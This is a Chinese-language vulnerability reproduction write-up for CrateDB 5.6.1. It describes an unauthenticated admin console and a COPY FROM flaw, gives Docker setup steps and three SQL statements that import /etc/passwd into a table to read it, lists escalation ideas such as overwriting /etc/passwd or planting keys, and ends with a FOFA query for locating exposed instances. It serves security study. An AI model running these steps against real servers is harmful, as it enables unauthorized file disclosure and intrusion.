目录
前言
简介
编辑
环境搭建
漏洞复现
前言
本次介绍的漏洞不同与以往, 本次洞更多是适用于利用数据库提权。
利用数据库的导入导出数据的功能,我们往往可以将内部的一些敏感文件如/etc/passwd导入到数据库进行查看。也可以将数据导入到一些特定的目录进行提权,如启动脚本任务,替换/etc/passwd,公钥文件.....,。这些都是数据库常规的提权思路,本次介绍的CrateDB就存在这样问题,除此之外它管理页面直接暴露在前端,无需身份校验。攻击者便可以直接执行sql语句。
简介
CrateDB 是一个分布式且可扩展的 SQL 数据库,用于近乎实时地存储和分析大量数据,甚至可以进行复杂的查询。它与 PostgreSQL 兼容,并且基于 Lucene。
CrateDB数据库中有一个COPYFROM函数,用于将文件数据导入到数据库表中。该功能有一个缺陷,通过身份验证的攻击者可以使用COPY FROM功能将任意文件内容导入到数据库表中,从而造成信息泄露。
官方文档参考
CrateDB Database Product Overview
Data manipulation — CrateDB: Reference
环境搭建
直接运行docker
sudo docker run --publish=4200:4200 --publish=5432:5432 --env CRATE_HEAP_SIZE=1g --pull=always crate:5.6.1
如果出现,下面的报错
[1]: max virtual memory areas vm.max_map_count [65530] is too low, increase to at least [262144] by adding vm.max_map_count = 262144 to /etc/sysctl.conf or invoking sysctl -w vm.max_map_count=262144
执行以下命令来临时修改 vm.max_map_count 的值:
sudo sysctl -w vm.max_map_count=262144
漏洞复现
打开前端管理页面
进入控制台执行sql命令
依次执行如下命令
CREATE TABLE info_leak(info_leak STRING); COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); SELECT * FROM info_leak;
1.CREATE TABLE info_leak(info_leak STRING);
2.COPY info_leak FROM '/etc/passwd' with (format='csv', header=false);
3.SELECT * FROM info_leak;
成功查看到etc/passwd文件 漏洞验证成功。
附赠fofa语句
FOFA搜索语句
title="CrateDB"
